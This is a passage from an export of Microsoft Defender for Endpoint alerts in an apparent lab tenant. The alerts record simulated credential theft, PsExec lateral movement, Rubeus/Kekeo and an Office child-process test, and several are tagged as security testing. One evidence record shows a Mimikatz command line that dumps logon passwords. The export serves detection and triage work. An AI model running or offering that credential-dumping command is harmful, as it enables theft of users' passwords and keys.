"sha256": "bbc83e4759d4b82bad31e371ad679aa414c72273bf97cee5aed8337ed8a4d79f",
"url": null,
"userPrincipalName": null,
"userSid": "S-1-5-18",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-18T05:19:52.22Z",
"fileName": "mimikatz.exe",
"filePath": "C:\\M365DAttack\\Mimikatz\\x64",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-18T05:04:12.7150402Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "\\Device\\HarddiskVolume4\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 4976,
"processCommandLine": "\"mimikatz.exe\" privilege::debug sekurlsa::logonpasswords exit",
"processCreationTime": "2022-11-18T05:13:19.3011237Z",
"processId": 9728,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "70df765f554ed7392200422c18776b8992c09231",
"sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
}
] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-09-30T05:36:50.2133333Z | Suspicious | None | guest | msdxv2.m365dpoc | S-1-5-21-2300221942-1987151257-321556088-1104 | e848b07a-87af-4448-9979-09f0b809c8d4 | jeff@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-12-14T17:19:16.9766667Z | Suspicious | None | user1 | msdxv2.m365dpoc | S-1-5-21-2300221942-1987151257-321556088-1110 | 598763ac-48bb-4671-9472-6be219756e33 | darol@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-12-13T16:08:25.23Z | Suspicious | None | darol | malicious.io | S-1-5-21-2300221942-1987151257-321556088-1110 | 598763ac-48bb-4671-9472-6be219756e33 | darol@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-12-14T07:43:44.26Z | Suspicious | None | bob | msdxv2.m365dpoc | S-1-5-21-2300221942-1987151257-321556088-1110 | 598763ac-48bb-4671-9472-6be219756e33 | darol@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
da638072963025498866_-272179420 | 012cce8a-ab09-41a3-8eca-9bedf0a2c27b | 975 | MicrosoftDefenderForEndpoint | 2022-12-22T08:58:22.5499055Z | 2022-12-22T08:59:28.19Z | null | 2022-12-22T08:47:29.8275995Z | 2022-12-22T08:47:50.8614648Z | Suspicious file registered as a service | A file with suspicious attributes or involved in possible breach activity was registered as a service. An attacker might be attempting to register the file as a service for persistence. | Persistence | New | Medium | 62 | PendingApproval | null | null | WindowsDefenderAtp | d15c9f84-aabc-46e5-a92e-7bb3ce5eceda | null | null | null | [
"T1021.002",
"T1074.002",
"T1543.003",
"T1569.002",
"T1570"
] | [
{
"aadDeviceId": null,
"defenderAvStatus": "Updated",
"deviceDnsName": "malicious.io",
"firstSeen": "2022-12-08T01:04:21.9057174Z",
"healthStatus": "Active",
"loggedOnUsers": [],
"mdatpDeviceId": "4f111b3b2366eacdcc66d7ad73548fff9b039c15",
"onboardingStatus": "Onboarded",
"osBuild": 19043,
"osPlatform": "Windows10",
"osProcessor": "x64",
"rbacGroupName": "UnassignedGroup",
"riskScore": "High",
"tags": [],
"version": "21H1",
"vmMetadata": {
"cloudProvider": "Unknown",
"resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV8/providers/Microsoft.Compute/virtualMachines/MSDXV8-Win10B",
"subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c",
"vmId": "97e5e58b-3d5e-4bfe-8e40-a88b49deff08"
}
}
] | [
{
"aadUserId": null,
"accountName": "LocalSystem",
"detectionStatus": null,
"deviceId": null,
"domainName": null,
"entityType": "User",
"evidenceCreationTime": "2022-12-22T08:58:22.5733333Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "ronhd",
"detectionStatus": null,
"deviceId": null,
"domainName": "MSDXV8",
"entityType": "User",
"evidenceCreationTime": "2022-12-22T08:58:22.5733333Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": null,
"userSid": "S-1-5-21-2159906967-4174806019-1002223092-1111",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": null,
"detectionStatus": "Detected",
"deviceId": "4f111b3b2366eacdcc66d7ad73548fff9b039c15",
"domainName": null,
"entityType": "File",
"evidenceCreationTime": "2022-12-22T08:58:22.5733333Z",
"fileName": "PSEXESVC.exe",
"filePath": "C:\\Windows",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "NotFound",
"remediationStatusDetails": "The system cannot find the file specified.,The system cannot find the file specified.",
"sha1": "f309b61a8b005b5ce0a3fb58caaa798cfc95f5db",
"sha256": "3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748",
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "SYSTEM",
"detectionStatus": "Detected",
"deviceId": "4f111b3b2366eacdcc66d7ad73548fff9b039c15",
"domainName": "NT AUTHORITY",
"entityType": "Process",
"evidenceCreationTime": "2022-12-22T08:58:22.5733333Z",
"fileName": "ntoskrnl.exe",
"filePath": "C:\\Windows\\System32",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": "2022-12-22T08:38:47.8970101Z",
"processId": 4,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "f83368154fce0f4e8f9d6fe000ef522fbb3884b7",
"sha256": "7e4a848626c99c715bd2c8686061420b8895e12ab8dfa0cce091f9df25750c13",
"url": null,
"userPrincipalName": null,
"userSid": "S-1-5-18",
"verdict": "Suspicious"
}
] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
da638043439145573052_839616834 | d8cc3725-deda-48de-bf02-a3f07cab86ed | 741 | MicrosoftDefenderForEndpoint | 2022-11-18T04:51:54.5573234Z | 2022-11-19T01:35:46.6533333Z | 2022-11-19T01:35:46.5533333Z | 2022-11-18T04:42:18.0120246Z | 2022-11-18T04:48:53.7870169Z | Suspicious System Owner/User Discovery | A known tool or technique was used to gather information on this device. Attackers might be trying to gather information about the target device or network for later attacks. | Discovery | Resolved | Low | null | UnsupportedAlertType | TruePositive | SecurityTesting | WindowsDefenderAtp | 9bfe28a9-21eb-4f8a-b51e-38ebd3650c88 | takeshi@msdxv2.m365dpoc.com | null | null | [
"T1033",
"T1059.001",
"T1087.001"
] | [
{
"aadDeviceId": null,
"defenderAvStatus": "NotSupported",
"deviceDnsName": "tmtower-book",
"firstSeen": "2022-10-10T06:18:04.255Z",
"healthStatus": "Active",
"loggedOnUsers": [
{
"accountName": "Takeshi",
"domainName": "TMTOWER-BOOK"
}
],
"mdatpDeviceId": "83b06aa80899050e5d4132992e36b5b8f14b64e9",
"onboardingStatus": "Onboarded",
"osBuild": 22621,
"osPlatform": "Windows11",
"osProcessor": "x64",
"rbacGroupName": "UnassignedGroup",
"riskScore": "High",
"tags": [],
"version": "22H2",
"vmMetadata": null
}
] | [
{
"aadUserId": null,
"accountName": "Takeshi",
"detectionStatus": null,
"deviceId": null,
"domainName": "TMTOWER-BOOK",
"entityType": "User",
"evidenceCreationTime": "2022-11-18T04:51:54.57Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": null,
"userSid": "S-1-5-21-7316772-2057538409-3008203053-1001",
"verdict": "Suspicious"
}
] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | Process | 2022-09-30T06:14:52.4166667Z | Suspicious | Active | jeff | msdxv2.m365dpoc | S-1-5-21-2300221942-1987151257-321556088-1104 | e848b07a-87af-4448-9979-09f0b809c8d4 | jeff@msdxv2.m365dpoc.com | 4f4970c3545972fea2bc1984d597fc810e6321e0 | 25c8266d2bc1d5626dcdf72419838b397d28d44d00ac09f02ff4e421b43ec369 | net.exe | C:\Windows\System32 | 7,736 | copy con test.txt | 2022-09-30T06:11:52.1907173Z | 4,064 | 2022-09-30T06:11:13.210308Z | powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0 | Detected | c7e147cb0eb3534a4dcea5acb8e61c933713b145 |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-11-16T09:08:30.79Z | Suspicious | None | SYSTEM | staging.net | S-1-5-18 | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-12-14T17:23:59.81Z | Malicious | None | darol | msdxv2.m365dpoc | S-1-5-21-2300221942-1987151257-321556088-1110 | 598763ac-48bb-4671-9472-6be219756e33 | darol@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
da638045930768340787_471517191 | 630cc631-5be4-4159-909f-dab5a338d73c | 765 | MicrosoftDefenderForEndpoint | 2022-11-21T02:04:36.8341051Z | 2022-11-26T01:35:43.17Z | 2022-11-26T01:35:43.0633333Z | 2022-11-21T02:01:45.1526175Z | 2022-11-21T02:20:27.7648847Z | 'Kekeo' malware was detected during lateral movement | 'DefenderObservation.ThreatFamily' malware was detected on this device. An attacker might be attempting to move laterally to this device from another device on the network. | LateralMovement | Resolved | Medium | 49 | TerminatedBySystem | TruePositive | SecurityTesting | WindowsDefenderAtp | 7a6f0432-57d7-4a96-a286-0bd733ea425d | takeshi@msdxv2.m365dpoc.com | null | null | [
"T1021.002",
"T1074.002",
"T1543.003",
"T1570"
] | [
{
"aadDeviceId": "14b11ffe-5128-4842-bbdf-31f0fbfcb600",
"defenderAvStatus": "Updated",
"deviceDnsName": "msdxv2-win10b.msdxv2.m365dpoc.com",
"firstSeen": "2022-08-08T08:29:47.252Z",
"healthStatus": "Active",
"loggedOnUsers": [
{
"accountName": "steve",
"domainName": "MSDXV2"
}
],
"mdatpDeviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48",
"onboardingStatus": "Onboarded",
"osBuild": 19043,
"osPlatform": "Windows10",
"osProcessor": "x64",
"rbacGroupName": "Semi Auto Client",
"riskScore": "Critical",
"tags": [
"MDE-Management",
"semi auto",
"servers"
],
"version": "21H1",
"vmMetadata": {
"cloudProvider": "Unknown",
"resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10B",
"subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c",
"vmId": "2f7d6bc4-df6d-4836-becd-aff9cb361b66"
}
}
] | [
{
"aadUserId": "89b6fc86-af84-47b2-a72d-325362598b2c",
"accountName": "ronhd",
"detectionStatus": null,
"deviceId": null,
"domainName": "MSDXV2",
"entityType": "User",
"evidenceCreationTime": "2022-11-21T02:04:36.8866667Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": "ronhd@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1111",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": null,
"detectionStatus": "Detected",
"deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48",
"domainName": null,
"entityType": "File",
"evidenceCreationTime": "2022-11-21T02:04:36.8866667Z",
"fileName": "Rubeus.exe",
"filePath": "C:\\Temp",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "fc870d086c53ded2e94300f7569aa9478186f2c7",
"sha256": null,
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": null,
"detectionStatus": "Detected",
"deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48",
"domainName": null,
"entityType": "File",
"evidenceCreationTime": "2022-11-21T02:04:36.8866667Z",
"fileName": "PSEXESVC.exe",
"filePath": "C:\\Windows",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "f309b61a8b005b5ce0a3fb58caaa798cfc95f5db",
"sha256": "3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748",
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": null,
"detectionStatus": null,
"deviceId": null,
"domainName": null,
"entityType": "Ip",
"evidenceCreationTime": "2022-11-21T02:04:36.8866667Z",
"fileName": null,
"filePath": null,
"ipAddress": "10.0.0.9",
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "SYSTEM",
"detectionStatus": "Detected",
"deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48",
"domainName": "NT AUTHORITY",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:04:36.8866667Z",
"fileName": "PSEXESVC.exe",
"filePath": "C:\\Windows",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-16T03:32:19.0279725Z",
"parentProcessFileName": "services.exe",
"parentProcessFilePath": "C:\\Windows\\System32",
"parentProcessId": 620,
"processCommandLine": "PSEXESVC.exe",
"processCreationTime": "2022-11-21T02:02:27.7361869Z",
"processId": 5760,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "f309b61a8b005b5ce0a3fb58caaa798cfc95f5db",
"sha256": "3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748",
"url": null,
"userPrincipalName": null,
"userSid": "S-1-5-18",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "SYSTEM",
"detectionStatus": "Detected",
"deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48",
"domainName": "NT AUTHORITY",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:04:36.8866667Z",
"fileName": "ntoskrnl.exe",
"filePath": "C:\\Windows\\System32",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": "2022-11-16T03:32:14.9719242Z",
"processId": 4,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "f83368154fce0f4e8f9d6fe000ef522fbb3884b7",
"sha256": "7e4a848626c99c715bd2c8686061420b8895e12ab8dfa0cce091f9df25750c13",
"url": null,
"userPrincipalName": null,
"userSid": "S-1-5-18",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": null,
"detectionStatus": null,
"deviceId": null,
"domainName": null,
"entityType": "User",
"evidenceCreationTime": "2022-11-21T02:21:44.9566667Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": null,
"userSid": "S-1-0-0",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": null,
"detectionStatus": "Detected",
"deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48",
"domainName": null,
"entityType": "File",
"evidenceCreationTime": "2022-11-21T02:21:44.9566667Z",
"fileName": "Rubeus.exe",
"filePath": "C:\\Temp",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": "The system cannot find the file specified.,Timed out because a pending action was not approved",
"sha1": "fc870d086c53ded2e94300f7569aa9478186f2c7",
"sha256": "a1fddd460edd35ed449d32cc43bc15675c48a314a6fa5fb158e3bc4fea460be1",
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "Malicious"
},
{
"aadUserId": null,
"accountName": "SYSTEM",
"detectionStatus": "Detected",
"deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48",
"domainName": "NT AUTHORITY",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:21:44.9566667Z",
"fileName": "PSEXESVC.exe",
"filePath": "C:\\Windows",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-16T03:32:19.0279725Z",
"parentProcessFileName": "services.exe",
"parentProcessFilePath": "C:\\Windows\\System32",
"parentProcessId": 620,
"processCommandLine": "PSEXESVC.exe",
"processCreationTime": "2022-11-21T02:16:27.1164549Z",
"processId": 7888,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "f309b61a8b005b5ce0a3fb58caaa798cfc95f5db",
"sha256": "3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748",
"url": null,
"userPrincipalName": null,
"userSid": "S-1-5-18",
"verdict": "Suspicious"
}
] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-12-12T13:26:39.0533333Z | Suspicious | None | darol | vpn.zone | S-1-5-21-2300221942-1987151257-321556088-1110 | 598763ac-48bb-4671-9472-6be219756e33 | darol@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
da638065141594290886_-2027130197 | 181f4889-6a9f-4cb4-bafa-c3041a3e60a2 | 794 | MicrosoftDefenderForEndpoint | 2022-12-13T07:42:39.4291047Z | 2022-12-13T07:51:49.87Z | 2022-12-13T07:51:49.6590458Z | 2022-12-13T07:29:32.1871954Z | 2022-12-13T07:29:32.1871954Z | 'Donoff' malware was prevented | Malware and unwanted software are undesirable applications that perform annoying, disruptive, or harmful actions on affected machines. Some of these undesirable applications can replicate and spread from one machine to another. Others are able to receive commands from remote attackers and perform activities associated with cyber attacks.
This detection might indicate that the malware was stopped from delivering its payload. However, it is prudent to check the machine for signs of infection. | Malware | Resolved | Informational | 57 | SuccessfullyRemediated | null | null | WindowsDefenderAv | d60f5b90-ecd8-4d77-8186-a801597ec762 | Automation | null | Donoff | [] | [
{
"aadDeviceId": null,
"defenderAvStatus": "Updated",
"deviceDnsName": "master-win10b.master.m365dpoc.com",
"firstSeen": "2022-12-13T07:14:16.856Z",
"healthStatus": "Active",
"loggedOnUsers": [],
"mdatpDeviceId": "cce7f66e4871950f3d9695ca2c8efbf3da533aba",
"onboardingStatus": "Onboarded",
"osBuild": 19043,
"osPlatform": "Windows10",
"osProcessor": "x64",
"rbacGroupName": "UnassignedGroup",
"riskScore": "High",
"tags": [],
"version": "21H1",
"vmMetadata": {
"cloudProvider": "Unknown",
"resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MASTER/providers/Microsoft.Compute/virtualMachines/MASTER-Win10B",
"subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c",
"vmId": "c7a645fc-c80c-4108-93bc-60a27bc7ba8b"
}
}
] | [
{
"aadUserId": null,
"accountName": null,
"detectionStatus": "Prevented",
"deviceId": "cce7f66e4871950f3d9695ca2c8efbf3da533aba",
"domainName": null,
"entityType": "File",
"evidenceCreationTime": "2022-12-13T07:42:39.6566667Z",
"fileName": "TestFile_OfficeChildProcess_D4F940AB-401B-4EFC-AADC-AD5F3C50688A.docm",
"filePath": "C:\\M365DPoCLab\\Simulation Files\\Attack Surface Reduction\\Block Office applications from creating child processes",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Prevented",
"remediationStatusDetails": "Entity was pre-remediated by Windows Defender",
"sha1": "7bb22f50157cf267281a81918540f4aed4e0b0e1",
"sha256": "f5ec6a746f5d70212a8779e33722964c9ede5c23b3e171cd01e68b1a6c954e86",
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "Malicious"
}
] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
da638045930199825735_1916178811 | 65a2531d-394f-42c9-999c-1435a314339e | 765 | MicrosoftDefenderForEndpoint | 2022-11-21T02:03:39.9825986Z | 2022-11-21T02:34:51.19Z | null | 2022-11-21T02:01:44.3120047Z | 2022-11-21T02:32:59.4225944Z | Malicious credential theft tool execution detected | A known credential theft tool execution command line was detected.
Either the process itself or its command line indicated an intent to dump users' credentials, keys, plain-text passwords and more. | CredentialAccess | New | High | null | UnsupportedAlertType | null | null | WindowsDefenderAtp | f5d3c5d8-ec3a-4412-ab45-934d8faff42c | null | null | null | [
"T1003"
] | [
{
"aadDeviceId": null,
"defenderAvStatus": "Updated",
"deviceDnsName": "msdxv2-win10v.msdxv2.m365dpoc.com",
"firstSeen": "2022-08-08T08:51:02.455Z",
"healthStatus": "Active",
"loggedOnUsers": [
{
"accountName": "jeff",
"domainName": "MSDXV2"
}
],
"mdatpDeviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"onboardingStatus": "Onboarded",
"osBuild": 17763,
"osPlatform": "Windows10",
"osProcessor": "x64",
"rbacGroupName": "Full Auto Clients",
"riskScore": "High",
"tags": [
"Full auto"
],
"version": "1809",
"vmMetadata": {
"cloudProvider": "Unknown",
"resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10V",
"subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c",
"vmId": "17881b39-b03f-4a2c-9b56-078be1330bd0"
}
}
] | [
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": null,
"deviceId": null,
"domainName": "msdxv2.m365dpoc",
"entityType": "User",
"evidenceCreationTime": "2022-11-21T02:03:40.3033333Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": null,
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": null,
"entityType": "File",
"evidenceCreationTime": "2022-11-21T02:03:40.3033333Z",
"fileName": "Get-KRBTicket.ps1",
"filePath": "C:\\M365DAttack",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "8cd78c31fcbe15d0c3ae78c06e5136983b438586",
"sha256": "5dbd299b13a978274d1a2bf59b58abc66277896c3ab867783f226750d620e4e1",
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": null,
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": null,
"entityType": "File",
"evidenceCreationTime": "2022-11-21T02:23:43.0433333Z",
"fileName": "Get-KRBTicket.ps1",
"filePath": "C:\\M365DAttack",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "9f01ec196f6e324de6587a716fce47a75fc73bae",
"sha256": "e12d110a9b4837e7495dee781e0ea9b3b753dd2ded7ff0576f7479234d4322da",
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "Suspicious"
}
] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-11-18T05:20:49.52Z | Malicious | None | jeff | msdxv2.m365dpoc | S-1-5-21-2300221942-1987151257-321556088-1104 | e848b07a-87af-4448-9979-09f0b809c8d4 | jeff@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
da638043434743776407_1398333926 | 510984ae-6d2c-4051-b24e-51f79efaef65 | 741 | MicrosoftDefenderForEndpoint | 2022-11-18T04:44:34.3776547Z | 2022-11-19T01:35:46.6533333Z | 2022-11-19T01:35:46.5533333Z | 2022-11-18T04:38:47.9052032Z | 2022-11-18T04:48:32.7584267Z | Malicious credential theft tool execution detected | A known credential theft tool execution command line was detected.
Either the process itself or its command line indicated an intent to dump users' credentials, keys, plain-text passwords and more. | CredentialAccess | Resolved | High | null | UnsupportedAlertType | TruePositive | SecurityTesting | WindowsDefenderAtp | f5d3c5d8-ec3a-4412-ab45-934d8faff42c | takeshi@msdxv2.m365dpoc.com | null | null | [
"T1003"
] | [
{
"aadDeviceId": null,
"defenderAvStatus": "NotSupported",
"deviceDnsName": "tmtower-book",
"firstSeen": "2022-10-10T06:18:04.255Z",
"healthStatus": "Active",
"loggedOnUsers": [
{
"accountName": "Takeshi",
"domainName": "TMTOWER-BOOK"
}
],
"mdatpDeviceId": "83b06aa80899050e5d4132992e36b5b8f14b64e9",
"onboardingStatus": "Onboarded",
"osBuild": 22621,
"osPlatform": "Windows11",
"osProcessor": "x64",
"rbacGroupName": "UnassignedGroup",
"riskScore": "Low",
"tags": [],
